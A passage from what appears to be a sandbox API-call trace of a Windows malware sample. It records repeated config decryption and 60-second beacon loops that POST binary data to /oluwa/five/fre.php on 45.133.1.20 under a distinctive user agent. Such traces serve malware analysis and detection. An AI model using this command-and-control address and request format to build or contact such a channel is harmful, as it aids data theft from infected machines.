LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.527] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.527] GetProcessHeap () returned 0x6a0000 [0231.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0231.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.529] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0231.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.531] CryptDestroyKey (hKey=0x6ad060) returned 1 [0231.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.532] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0231.532] GetProcessHeap () returned 0x6a0000 [0231.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.534] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0231.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.535] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0231.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.536] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0231.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.538] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0231.538] GetProcessHeap () returned 0x6a0000 [0231.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.538] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0231.538] GetProcessHeap () returned 0x6a0000 [0231.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0231.538] socket (af=2, type=1, protocol=6) returned 0x710 [0231.538] connect (s=0x710, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0231.563] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0231.564] GetProcessHeap () returned 0x6a0000 [0231.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0231.564] GetProcessHeap () returned 0x6a0000 [0231.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0231.565] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.566] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.566] GetProcessHeap () returned 0x6a0000 [0231.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9480 [0231.566] GetProcessHeap () returned 0x6a0000 [0231.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.566] GetProcessHeap () returned 0x6a0000 [0231.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0231.566] GetProcessHeap () returned 0x6a0000 [0231.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0231.567] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.568] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.568] GetProcessHeap () returned 0x6a0000 [0231.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0231.571] GetProcessHeap () returned 0x6a0000 [0231.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.572] send (s=0x710, buf=0x6bd460*, len=242, flags=0) returned 242 [0231.573] send (s=0x710, buf=0x6bb998*, len=159, flags=0) returned 159 [0231.573] GetProcessHeap () returned 0x6a0000 [0231.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0231.573] recv (in: s=0x710, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0231.664] GetProcessHeap () returned 0x6a0000 [0231.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0231.665] GetProcessHeap () returned 0x6a0000 [0231.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0231.665] GetProcessHeap () returned 0x6a0000 [0231.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9480 | out: hHeap=0x6a0000) returned 1 [0231.665] GetProcessHeap () returned 0x6a0000 [0231.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0231.666] closesocket (s=0x710) returned 0 [0231.666] GetProcessHeap () returned 0x6a0000 [0231.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0231.666] GetProcessHeap () returned 0x6a0000 [0231.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.667] GetProcessHeap () returned 0x6a0000 [0231.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0231.667] GetProcessHeap () returned 0x6a0000 [0231.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1444) returned 0x710 [0231.669] Sleep (dwMilliseconds=0xea60) [0231.670] GetProcessHeap () returned 0x6a0000 [0231.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0231.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.672] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.678] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0231.686] GetProcessHeap () returned 0x6a0000 [0231.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0231.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.690] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0231.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.692] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.693] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.693] GetProcessHeap () returned 0x6a0000 [0231.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0231.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.694] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0231.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.697] CryptDestroyKey (hKey=0x6ad020) returned 1 [0231.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.698] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0231.698] GetProcessHeap () returned 0x6a0000 [0231.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.699] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.700] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.701] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.702] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.702] GetProcessHeap () returned 0x6a0000 [0231.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.702] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.702] GetProcessHeap () returned 0x6a0000 [0231.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.703] GetProcessHeap () returned 0x6a0000 [0231.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.703] GetProcessHeap () returned 0x6a0000 [0231.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0231.704] GetProcessHeap () returned 0x6a0000 [0231.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0231.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.747] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0231.760] GetProcessHeap () returned 0x6a0000 [0231.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0231.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.761] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0231.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.763] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.764] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.764] GetProcessHeap () returned 0x6a0000 [0231.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0231.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.766] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0231.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.767] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0231.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.768] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0231.768] GetProcessHeap () returned 0x6a0000 [0231.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.771] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0231.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.772] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0231.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.780] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0231.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.781] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0231.781] GetProcessHeap () returned 0x6a0000 [0231.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0231.781] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0231.781] GetProcessHeap () returned 0x6a0000 [0231.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0231.781] socket (af=2, type=1, protocol=6) returned 0x714 [0231.785] connect (s=0x714, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0231.814] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0231.815] GetProcessHeap () returned 0x6a0000 [0231.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0231.815] GetProcessHeap () returned 0x6a0000 [0231.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0231.816] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.817] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0231.820] GetProcessHeap () returned 0x6a0000 [0231.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9300 [0231.820] GetProcessHeap () returned 0x6a0000 [0231.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.820] GetProcessHeap () returned 0x6a0000 [0231.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0231.821] GetProcessHeap () returned 0x6a0000 [0231.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0231.822] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0231.824] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0231.824] GetProcessHeap () returned 0x6a0000 [0231.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0231.824] GetProcessHeap () returned 0x6a0000 [0231.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0231.826] send (s=0x714, buf=0x6bd460*, len=242, flags=0) returned 242 [0231.840] send (s=0x714, buf=0x6bb998*, len=159, flags=0) returned 159 [0231.840] GetProcessHeap () returned 0x6a0000 [0231.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0231.840] recv (in: s=0x714, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0231.919] GetProcessHeap () returned 0x6a0000 [0231.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0231.920] GetProcessHeap () returned 0x6a0000 [0231.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0231.920] GetProcessHeap () returned 0x6a0000 [0231.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9300 | out: hHeap=0x6a0000) returned 1 [0231.920] GetProcessHeap () returned 0x6a0000 [0231.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0231.922] closesocket (s=0x714) returned 0 [0231.923] GetProcessHeap () returned 0x6a0000 [0231.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0231.923] GetProcessHeap () returned 0x6a0000 [0231.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.924] GetProcessHeap () returned 0x6a0000 [0231.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0231.924] GetProcessHeap () returned 0x6a0000 [0231.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0231.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1448) returned 0x714 [0231.943] Sleep (dwMilliseconds=0xea60) [0231.945] GetProcessHeap () returned 0x6a0000 [0231.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0231.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0231.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.957] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0231.969] GetProcessHeap () returned 0x6a0000 [0231.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9bd8 [0231.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.970] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b9bd8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0231.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.981] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0231.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.982] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.982] GetProcessHeap () returned 0x6a0000 [0231.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9bd8 | out: hHeap=0x6a0000) returned 1 [0231.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.985] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0231.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.986] CryptDestroyKey (hKey=0x6ad020) returned 1 [0231.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0231.987] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0231.987] GetProcessHeap () returned 0x6a0000 [0231.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0231.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.989] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.990] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.991] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0231.992] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.992] GetProcessHeap () returned 0x6a0000 [0231.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0231.993] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0231.993] GetProcessHeap () returned 0x6a0000 [0231.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0231.994] GetProcessHeap () returned 0x6a0000 [0231.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0231.995] GetProcessHeap () returned 0x6a0000 [0231.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0231.995] GetProcessHeap () returned 0x6a0000 [0231.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0231.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0232.023] GetProcessHeap () returned 0x6a0000 [0232.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0232.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.024] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0232.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.026] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0232.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.027] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.027] GetProcessHeap () returned 0x6a0000 [0232.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0232.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.029] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0232.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.030] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0232.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0232.032] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0232.032] GetProcessHeap () returned 0x6a0000 [0232.032] RtlAllocateHeap 